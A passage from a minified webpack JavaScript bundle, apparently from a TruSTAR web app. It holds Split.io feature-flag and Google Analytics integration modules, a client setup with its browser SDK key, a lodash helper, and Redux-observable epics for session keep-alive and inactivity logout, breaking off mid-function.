 * @returns a promise that doesn't need to be handled for rejection (except when using async/await syntax) and
 * with a method named `hasOnFulfilled` that returns true if the promise has attached an onFulfilled handler.
 */
function promiseWrapper(customPromise, defaultOnRejected) {
  var hasOnFulfilled = false;
  var hasOnRejected = false;

  function chain(promise) {
    var newPromise = new Promise(function (res, rej) {
      return promise.then(res, function (value) {
        if (hasOnRejected) {
          rej(value);
        } else {
          defaultOnRejected(value);
        }
      });
    });
    var originalThen = newPromise.then; // Using `defineProperty` in case Promise.prototype.then property is not writable

    Object.defineProperty(newPromise, 'then', {
      value: function value(onfulfilled, onrejected) {
        var result = originalThen.call(newPromise, onfulfilled, onrejected);
        if (typeof onfulfilled === 'function') hasOnFulfilled = true;

        if (typeof onrejected === 'function') {
          hasOnRejected = true;
          return result;
        } else {
          return chain(result);
        }
      }
    });
    return newPromise;
  }

  var result = chain(customPromise);

  result.hasOnFulfilled = function () {
    return hasOnFulfilled;
  };

  return result;
}

/***/ }),
/* 2887 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__ga_GaToSplit__ = __webpack_require__(2888);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__ga_SplitToGa__ = __webpack_require__(2889);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_constants__ = __webpack_require__(56);



/**
 * Factory function for browser IntegrationsManager.
 * The integrations manager instantiates integration modules, and bypass tracked events and impressions to them.
 *
 * @param {Context} context SplitFactory context
 *
 * @returns integration manager or null if `integrations` are not present in settings.
 */

var integrationsManagerFactory = function integrationsManagerFactory(context) {
  var settings = context.get(context.constants.SETTINGS);
  var listeners = []; // No need to check if `settings.integrations` is an array. It was already validated in settings validation

  settings.integrations.forEach(function (integrationOptions) {
    var type = integrationOptions.type;
    var integration;

    switch (type) {
      case __WEBPACK_IMPORTED_MODULE_2__utils_constants__["f" /* GOOGLE_ANALYTICS_TO_SPLIT */]:
        {
          var storage = context.get(context.constants.STORAGE);
          var coreSettings = settings.core;
          integration = Object(__WEBPACK_IMPORTED_MODULE_0__ga_GaToSplit__["a" /* default */])(integrationOptions, storage, coreSettings);
          break;
        }

      case __WEBPACK_IMPORTED_MODULE_2__utils_constants__["l" /* SPLIT_TO_GOOGLE_ANALYTICS */]:
        {
          integration = new __WEBPACK_IMPORTED_MODULE_1__ga_SplitToGa__["a" /* default */](integrationOptions);
          break;
        }
    }

    if (integration && integration.queue) listeners.push(integration);
  }); // If `listeners` is empty, not return a integration manager

  if (listeners.length === 0) return; // Exception safe methods: each integration module is responsable for handling errors

  return {
    handleImpression: function handleImpression(impressionData) {
      listeners.forEach(function (listener) {
        return listener.queue({
          type: __WEBPACK_IMPORTED_MODULE_2__utils_constants__["k" /* SPLIT_IMPRESSION */],
          payload: impressionData
        });
      });
    },
    handleEvent: function handleEvent(eventData) {
      listeners.forEach(function (listener) {
        return listener.queue({
          type: __WEBPACK_IMPORTED_MODULE_2__utils_constants__["j" /* SPLIT_EVENT */],
          payload: eventData
        });
      });
    }
  };
};

/* harmony default export */ __webpack_exports__["a"] = (integrationsManagerFactory);

/***/ }),
/* 2888 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export defaultMapper */
/* unused harmony export defaultPrefix */
/* unused harmony export validateIdentities */
/* unused harmony export validateEventData */
/* unused harmony export fixEventTypeId */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__ = __webpack_require__(202);




var logName = 'splitio-ga-to-split',
    logNameMapper = logName + ':mapper';
var log = Object(__WEBPACK_IMPORTED_MODULE_2__utils_logger__["b" /* default */])(logName);
/**
 * Provides a plugin to use with analytics.js, accounting for the possibility
 * that the global command queue has been renamed or not yet defined.
 * @param {string} pluginName The plugin name identifier.
 * @param {Function} pluginConstructor The plugin constructor function.
 */

function providePlugin(pluginName, pluginConstructor) {
  // get reference to global command queue. Init it if not defined yet.
  var gaAlias = window.GoogleAnalyticsObject || 'ga';

  window[gaAlias] = window[gaAlias] || function () {
    for (var _len = arguments.length, args = new Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    (window[gaAlias].q = window[gaAlias].q || []).push(args);
  }; // provides the plugin for use with analytics.js.


  window[gaAlias]('provide', pluginName, pluginConstructor);
} // Default mapping: object used for building the default mapper from hits to Split events


var defaultMapping = {
  eventTypeId: {
    event: 'eventAction',
    social: 'socialAction'
  },
  eventValue: {
    event: 'eventValue',
    timing: 'timingValue'
  },
  eventProperties: {
    pageview: ['page'],
    screenview: ['screenName'],
    event: ['eventCategory', 'eventLabel'],
    social: ['socialNetwork', 'socialTarget'],
    timing: ['timingCategory', 'timingVar', 'timingLabel'],
    exception: ['exDescription', 'exFatal']
  }
};
/**
 * Build a mapper function based on a mapping object
 *
 * @param {object} mapping
 */

function mapperBuilder(mapping) {
  return function (model) {
    var hitType = model.get('hitType');
    var eventTypeId = model.get(mapping.eventTypeId[hitType] || 'hitType');
    var value = model.get(mapping.eventValue[hitType]);
    var properties = {};
    var fields = mapping.eventProperties[hitType];

    if (fields) {
      for (var i = 0; i < fields.length; i++) {
        properties[fields[i]] = model.get(fields[i]);
      }
    }

    return {
      eventTypeId: eventTypeId,
      value: value,
      properties: properties,
      timestamp: Date.now()
    };
  };
} // exposed for unit testing purposses.


var defaultMapper = mapperBuilder(defaultMapping);
var defaultPrefix = 'ga';
/**
 * Return a new list of identities removing invalid and duplicated ones.
 *
 * @param {Array} identities list of identities
 * @returns list of valid and unique identities. The list might be empty if `identities` is not an array or all its elements are invalid.
 */

function validateIdentities(identities) {
  if (!Array.isArray(identities)) return []; // Remove duplicated identities

  var uniqueIdentities = Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["r" /* unicAsStrings */])(identities); // Filter based on rum-agent identities validator

  return uniqueIdentities.filter(function (identity) {
    if (!identity) return false;
    var maybeKey = identity.key;
    var maybeTT = identity.trafficType;
    if (!Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["j" /* isString */])(maybeKey) && !Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["l" /* numberIsFinite */])(maybeKey)) return false;
    if (!Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["j" /* isString */])(maybeTT)) return false;
    return true;
  });
}
/**
 * Checks if EventData fields (except EventTypeId) are valid, and logs corresponding warnings.
 * EventTypeId is validated separately.
 *
 * @param {EventData} data event data instance to validate. Precondition: data != undefined
 * @returns {boolean} Whether the data instance is a valid EventData or not.
 */

function validateEventData(eventData) {
  if (!Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["d" /* validateEvent */])(eventData.eventTypeId, logNameMapper)) return false;
  if (Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["f" /* validateEventValue */])(eventData.value, logNameMapper) === false) return false;

  var _validateEventPropert = Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["e" /* validateEventProperties */])(eventData.properties, logNameMapper),
      properties = _validateEventPropert.properties;

  if (properties === false) return false;
  if (eventData.timestamp && !Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["l" /* numberIsFinite */])(eventData.timestamp)) return false;
  if (eventData.key && Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["i" /* validateKey */])(eventData.key, logNameMapper) === false) return false;
  if (eventData.trafficTypeName && Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["m" /* validateTrafficType */])(eventData.trafficTypeName, logNameMapper) === false) return false;
  return true;
}
var INVALID_PREFIX_REGEX = /^[^a-zA-Z0-9]+/;
var INVALID_SUBSTRING_REGEX = /[^-_.:a-zA-Z0-9]+/g;
/**
 * Fixes the passed string value to comply with EventTypeId format, by removing invalid characters and truncating if necessary.
 *
 * @param {string} eventTypeId string value to fix.
 * @returns {string} Fixed version of `eventTypeId`.
 */

function fixEventTypeId(eventTypeId) {
  // return the input eventTypeId if it cannot be fixed
  if (!Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["j" /* isString */])(eventTypeId) || eventTypeId.length === 0) {
    return eventTypeId;
  } // replace invalid substrings and truncate


  var fixed = eventTypeId.replace(INVALID_PREFIX_REGEX, '').replace(INVALID_SUBSTRING_REGEX, '_');
  var truncated = fixed.slice(0, 80);
  if (truncated.length < fixed.length) log.warn('EventTypeId was truncated because it cannot be more than 80 characters long.');
  return truncated;
}
/**
 * GaToSplit integration.
 * This function provides the SplitTracker plugin to ga command queue.
 *
 * @param {object} sdkOptions options passed at the SDK integrations settings
 * @param {object} storage SDK storage passed to track events
 * @param {object} coreSettings core settings used to define an identity if no one provided as SDK or plugin options
 */

function GaToSplit(sdkOptions, storage, coreSettings) {
  var defaultOptions = {
    prefix: defaultPrefix,
    // We set default identities if key and TT are present in settings.core
    identities: coreSettings.key && coreSettings.trafficType ? [{
      key: coreSettings.key,
      trafficType: coreSettings.trafficType
    }] : undefined
  };

  var SplitTracker = // Constructor for the SplitTracker plugin.
  function SplitTracker(tracker, pluginOptions) {
    // precedence of options: SDK options (config.integrations) overwrite pluginOptions (`ga('require', 'splitTracker', pluginOptions)`)
    var opts = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, defaultOptions, sdkOptions, pluginOptions);
    this.tracker = tracker; // Validate identities

    var validIdentities = validateIdentities(opts.identities);

    if (validIdentities.length === 0) {
      log.warn('No valid identities were provided. Please check that you are passing a valid list of identities or providing a traffic type at the SDK configuration.');
      return;
    }

    var invalids = validIdentities.length - opts.identities.length;

    if (invalids) {
      log.warn(invalids + " identities were discarded because they are invalid or duplicated. Identities must be an array of objects with key and trafficType.");
    }

    opts.identities = validIdentities; // Validate prefix

    if (!Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["j" /* isString */])(opts.prefix)) {
      log.warn('The provided `prefix` was ignored since it is invalid. Please check that you are passing a string object as `prefix`.');
      opts.prefix = undefined;
    } // Overwrite sendHitTask to perform plugin tasks:
    // 1) filter hits
    // 2) map hits to Split events
    // 3) handle events, i.e., validate and send them to Split BE


    var originalSendHitTask = tracker.get('sendHitTask');
    tracker.set('sendHitTask', function (model) {
      originalSendHitTask(model); // filter hit if `hits` flag is false or if it comes from Split-to-GA integration

      if (opts.hits === false || model.get('splitHit')) return;

      try {
        if (opts.filter && !opts.filter(model)) return;
      } catch (err) {
        log.warn("GaToSplit custom filter threw: " + err);
        return;
      } // map hit into an EventData instance


      var eventData = defaultMapper(model);

      if (opts.mapper) {
        try {
          eventData = opts.mapper(model, eventData);
        } catch (err) {
          log.warn("GaToSplit custom mapper threw: " + err);
          return;
        }

        if (!eventData) return;
      } // Add prefix. Nothing is appended if the prefix is falsy, e.g. undefined or ''.


      if (opts.prefix) eventData.eventTypeId = opts.prefix + "." + eventData.eventTypeId;
      eventData.eventTypeId = fixEventTypeId(eventData.eventTypeId);
      if (!validateEventData(eventData)) return; // Store the event

      if (eventData.key && eventData.trafficTypeName) {
        storage.events.track(eventData);
      } else {
        // Store the event for each Key-TT pair (identities), if key and TT is not present in eventData
        opts.identities.forEach(function (identity) {
          var event = __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
            key: identity.key,
            trafficTypeName: identity.trafficType
          }, eventData);
          storage.events.track(event);
        });
      }
    });
    log.info('Started GA-to-Split integration');
  }; // Register the plugin, even if config is invalid, since, if not provided, it will block `ga` command queue.


  providePlugin('splitTracker', SplitTracker);
}

/* harmony default export */ __webpack_exports__["a"] = (GaToSplit);

/***/ }),
/* 2889 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_constants__ = __webpack_require__(56);



var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-split-to-ga');

var SplitToGa = /*#__PURE__*/function () {
  // Default mapper function.
  SplitToGa.defaultMapper = function defaultMapper(_ref) {
    var type = _ref.type,
        payload = _ref.payload;

    switch (type) {
      case __WEBPACK_IMPORTED_MODULE_2__utils_constants__["k" /* SPLIT_IMPRESSION */]:
        return {
          hitType: 'event',
          eventCategory: 'split-impression',
          eventAction: 'Evaluate ' + payload.impression.feature,
          eventLabel: 'Treatment: ' + payload.impression.treatment + '. Targeting rule: ' + payload.impression.label + '.',
          nonInteraction: true
        };

      case __WEBPACK_IMPORTED_MODULE_2__utils_constants__["j" /* SPLIT_EVENT */]:
        return {
          hitType: 'event',
          eventCategory: 'split-event',
          eventAction: payload.eventTypeId,
          eventValue: payload.value,
          nonInteraction: true
        };
    }

    return null;
  } // Util to access ga command queue, accounting for the possibility that it has been renamed.
  ;

  SplitToGa.getGa = function getGa() {
    return typeof window !== 'undefined' ? window[window['GoogleAnalyticsObject'] || 'ga'] : undefined;
  }
  /**
   * Validates if a given object is a UniversalAnalytics.FieldsObject instance, and logs a warning if not.
   * It checks that the object contains a `hitType`, since it is the minimal field required to send the hit
   * and avoid the GA error `No hit type specified. Aborting hit.`.
   * Other validations (e.g., an `event` hitType must have a `eventCategory` and `eventAction`) are handled
   * and logged (as warnings or errors depending the case) by GA debugger, but the hit is sent anyway.
   *
   * @param {UniversalAnalytics.FieldsObject} fieldsObject object to validate.
   * @returns {boolean} Whether the data instance is a valid FieldsObject or not.
   */
  ;

  SplitToGa.validateFieldsObject = function validateFieldsObject(fieldsObject) {
    if (fieldsObject && fieldsObject.hitType) return true;
    log.warn('your custom mapper returned an invalid FieldsObject instance. It must be an object with at least a `hitType` field.');
    return false;
  };

  function SplitToGa(options) {
    // Check if `ga` object is available
    if (typeof SplitToGa.getGa() !== 'function') {
      log.warn('`ga` command queue not found. No hits will be sent.'); // Return an empty object to avoid creating a SplitToGa instance

      return {};
    }

    this.trackerNames = SplitToGa.defaultTrackerNames;

    if (options) {
      if (typeof options.filter === 'function') this.filter = options.filter;
      if (typeof options.mapper === 'function') this.mapper = options.mapper; // We strip off duplicated values if we received a `trackerNames` param.
      // We don't warn if a tracker does not exist, since the user might create it after the SDK is initialized.
      // Note: GA allows to create and get trackers using a string or number as tracker name, and does nothing if other types are used.

      if (Array.isArray(options.trackerNames)) this.trackerNames = Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["s" /* uniq */])(options.trackerNames); // No need to validate `impressions` and `events` flags. Any other value than `false` is ignored.

      this.impressions = options.impressions;
      this.events = options.events;
    }

    log.info('Started Split-to-GA integration');
  }

  var _proto = SplitToGa.prototype;

  _proto.queue = function queue(data) {
    // access ga command queue via `getGa` method, accounting for the possibility that
    // the global `ga` reference was not yet mutated by analytics.js.
    var ga = SplitToGa.getGa();

    if (ga) {
      if (this.impressions === false && data.type === __WEBPACK_IMPORTED_MODULE_2__utils_constants__["k" /* SPLIT_IMPRESSION */]) return;
      if (this.events === false && data.type === __WEBPACK_IMPORTED_MODULE_2__utils_constants__["j" /* SPLIT_EVENT */]) return;
      var fieldsObject;

      try {
        // only try/catch filter and mapper, which might be defined by the user
        // filter
        if (this.filter && !this.filter(data)) return; // map data into a FieldsObject instance

        fieldsObject = SplitToGa.defaultMapper(data);

        if (this.mapper) {
          fieldsObject = this.mapper(data, fieldsObject); // don't send the hit if it is falsy or invalid

          if (!fieldsObject || !SplitToGa.validateFieldsObject(fieldsObject)) return;
        }
      } catch (err) {
        log.warn("SplitToGa queue method threw: " + err + ". No hit was sent.");
        return;
      } // send the hit


      this.trackerNames.forEach(function (trackerName) {
        var sendCommand = trackerName ? trackerName + ".send" : 'send'; // mark the hit as a Split one to avoid the loop.

        fieldsObject.splitHit = true; // Send to GA using our reference to the GA object.

        ga(sendCommand, fieldsObject);
      });
    }
  };

  return SplitToGa;
}(); // A falsy object represents the default tracker


SplitToGa.defaultTrackerNames = [''];
/* harmony default export */ __webpack_exports__["a"] = (SplitToGa);

/***/ }),
/* 2890 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_time__ = __webpack_require__(1284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_object_assign__);



var ImpressionCounter = /*#__PURE__*/function () {
  function ImpressionCounter() {
    this.cache = {};
  }
  /**
  * Builds key to be stored in the cache with the featureName and the timeFrame truncated.
  */


  var _proto = ImpressionCounter.prototype;

  _proto._makeKey = function _makeKey(featureName, timeFrame) {
    return featureName + "::" + Object(__WEBPACK_IMPORTED_MODULE_0__utils_time__["a" /* truncateTimeFrame */])(timeFrame);
  }
  /**
  * Increments the quantity of impressions with the passed featureName and timeFrame.
  */
  ;

  _proto.inc = function inc(featureName, timeFrame, amount) {
    var key = this._makeKey(featureName, timeFrame);

    var currentAmount = this.cache[key];
    this.cache[key] = currentAmount ? currentAmount + amount : amount;
  }
  /**
  * Returns all the elements stored in the cache and resets the cache.
  */
  ;

  _proto.popAll = function popAll() {
    var res = {};
    __WEBPACK_IMPORTED_MODULE_1_object_assign___default()(res, this.cache);
    this.cache = {};
    return res;
  }
  /**
  * Returns how many keys are stored in cache.
  */
  ;

  _proto.size = function size() {
    return Object.keys(this.cache).length;
  };

  return ImpressionCounter;
}();

/* harmony default export */ __webpack_exports__["a"] = (ImpressionCounter);

/***/ }),
/* 2891 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return makeFlagList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return makeSplitClient; });
/* unused harmony export getSplitAuthorizationKey */
/* unused harmony export isSplitDebugMode */
/* unused harmony export isSplitLocalMode */
/* unused harmony export getSplitMockFeatures */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__splitsoftware_splitio__ = __webpack_require__(1271);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__constants__ = __webpack_require__(302);



var makeFlagList = function makeFlagList() {
  var flagsConfiguration = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_1__constants__["b" /* flags */];

  return Object.values(flagsConfiguration);
};

var makeSplitClient = function makeSplitClient(customerKey) {
  // configurations are in seconds
  return Object(__WEBPACK_IMPORTED_MODULE_0__splitsoftware_splitio__["a" /* SplitFactory */])({
    startup: {
      requestTimeoutBeforeReady: 5,
      retriesOnFailureBeforeReady: 1,
      readyTimeout: 5,
      eventsFirstPushWindow: 10
    },
    core: {
      authorizationKey: getSplitAuthorizationKey(),
      key: customerKey,
      trafficType: 'user',
      labelsEnabled: true
    },
    scheduler: {
      featuresRefreshRate: 30,
      segmentsRefreshRate: 60,
      metricsRefreshRate: 60,
      impressionsRefreshRate: 60,
      eventsPushRate: 60,
      eventsQueueSize: 500,
      offlineRefreshRate: 30000
    },
    storage: {
      type: 'LOCALSTORAGE'
    },
    debug: isSplitDebugMode(),
    features: getSplitMockFeatures()
  }).client();
};

var getSplitAuthorizationKey = function getSplitAuthorizationKey() {
  return "7iki1574js01dvm0oq3kaaj3755bj02lgaeo";
};

var isSplitDebugMode = function isSplitDebugMode() {
  switch ("production") {
    default:
      return false;
  }
};

var isSplitLocalMode = function isSplitLocalMode() {
  return "7iki1574js01dvm0oq3kaaj3755bj02lgaeo" === 'localhost';
};

var getSplitMockFeatures = function getSplitMockFeatures() {
  var isSplitDebugMode = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;

  return isSplitLocalMode() ? __WEBPACK_IMPORTED_MODULE_1__constants__["c" /* localhostTreatments */] : null;
};

/***/ }),
/* 2892 */
/***/ (function(module, exports) {

/**
 * lodash 4.0.0 (Custom Build) <https://lodash.com/>
 * Build: `lodash modularize exports="npm" -o ./`
 * Copyright 2012-2016 The Dojo Foundation <http://dojofoundation.org/>
 * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>
 * Copyright 2009-2016 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
 * Available under MIT license <https://lodash.com/license>
 */

/**
 * Checks if `value` is `null` or `undefined`.
 *
 * @static
 * @memberOf _
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is nullish, else `false`.
 * @example
 *
 * _.isNil(null);
 * // => true
 *
 * _.isNil(void 0);
 * // => true
 *
 * _.isNil(NaN);
 * // => false
 */
function isNil(value) {
  return value == null;
}

module.exports = isNil;


/***/ }),
/* 2893 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_rxjs_operators__ = __webpack_require__(449);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_rxjs_operators___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_rxjs_operators__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_redux_persist_immutable_constants__ = __webpack_require__(705);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_redux_persist_immutable_constants___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_redux_persist_immutable_constants__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_util__ = __webpack_require__(892);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_trustar_2_0_themes_common_constants__ = __webpack_require__(406);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__getters_js__ = __webpack_require__(182);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__constants_js__ = __webpack_require__(172);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__action_types_js__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_js_cookie__ = __webpack_require__(900);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_js_cookie___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_13_js_cookie__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_rxjs_operator_distinct__ = __webpack_require__(1017);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_rxjs_operator_distinct___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_14_rxjs_operator_distinct__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };













var debug = __WEBPACK_IMPORTED_MODULE_0_debug___default()('app:modules:app:epics'); // eslint-disable-line no-unused-vars
var errorDebugger = __WEBPACK_IMPORTED_MODULE_0_debug___default()('app:errors');









var handleInactivity = function handleInactivity(_ref) {
  var type = _ref.type;

  debug('handling inactivity');
  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_12__action_types_js__["WARNING"]:
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["SET_TIMEOUT_WARNING"], payload: true });
    case __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGOUT"]:
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGOUT"] });
    default:
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].empty();
  }
};

var getUserActivityStream = function getUserActivityStream(_ref2) {
  var warningTime = _ref2.warningTime,
      logoutTime = _ref2.logoutTime;

  // if any click action is detected, emit the observable and write the change
  // to local storage so that other tabs can react.
  var clickSource = __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].fromEvent(document.body, 'click').debounceTime(1000).do(function () {
    return localStorage.setItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["LAST_USER_ACTION_LOCALSTORAGE_KEY"], (+new Date()).toString());
  }).startWith(null); // Required to allow for the switchMap debouncing

  // Polls localstorage on a constant basis to see if any tab has seen action within
  // the current logout time window.
  var localStoragePoller = __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].interval(__WEBPACK_IMPORTED_MODULE_11__constants_js__["ACTIVITY_LOCAL_STORAGE_POLL_FREQUENCY_MS"]).map(function () {
    return +localStorage.getItem(__WEBPACK_IMPORTED_MODULE_11__constants_js__["LAST_USER_ACTION_LOCALSTORAGE_KEY"]);
  }).distinctUntilChanged().filter(function (x) {
    return +new Date() - x < logoutTime;
  });

  // if either a new click happens or another tab has updated localStorage
  return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].merge(localStoragePoller, clickSource).switchMap(function () {
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].merge(__WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["WARNING"] }).delay(warningTime), __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGOUT"] }).delay(logoutTime));
  }).mergeMap(handleInactivity);
};

var keepAliveEpic = function keepAliveEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["INITIALIZE"]).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].interval(__WEBPACK_IMPORTED_MODULE_11__constants_js__["SERVER_SESSION_TIME"]).startWith(-1) // NOTE: -1 is arbitrary. Flow just wants a number not null
    .mergeMap(function () {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["CONFIRM_ALIVE"]
      });
    });
  });
};

/*
 * Note: the logic within confirmAliveEpic was originally in
 * keepAliveEpic, but it was hard to test and reason about.
 *
 * Upon error to /tools/session, it would log output to Sentry 
 * and then retry every minute until there was a success.
 * This retry logic caused infinite loops when the session
 * was invalidated through other means and caused issues
 * with the login page.
 *
 * I have removed this functionality.  There is a possibility
 * that /tools/session could be temporarily unavaible due to
 * brief server outage, but I think the platform is more stable
 * now then it was when this code was originally written.
 * We could put in a direct check on whether the error is type
 * 401 or other, but seriously...if the session check fails,
 * then the session should just end.
 *
 */
var confirmAliveEpic = function confirmAliveEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["CONFIRM_ALIVE"]).switchMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_11__constants_js__["KEEPALIVE_ENDPOINT"]).mergeMap(function () {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].empty();
    }).catch(function (err, obs) {
      debug('Keep alive endpoint failed and logout command executed', err);
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["LOGOUT"] });
    });
  });
};

var sessionTimeoutEpic = function sessionTimeoutEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__action_types_js__["INITIALIZE"]).mergeMap(function () {
    return ajax.get('/services/session-timeout').map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(function (payload) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_12__action_types_js__["FETCH_SERVER_SESSION_TIMEOUT_SUCCESS"],
        payload: payload
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_2_rxjs__["Observable"].of(err).do(function (err) {
        return debug('Could not fetch server session timeout', err);
      }).ignoreElements();
    });
  });
};

var userActivityEpic = function userActivityEpic(action$, store) {
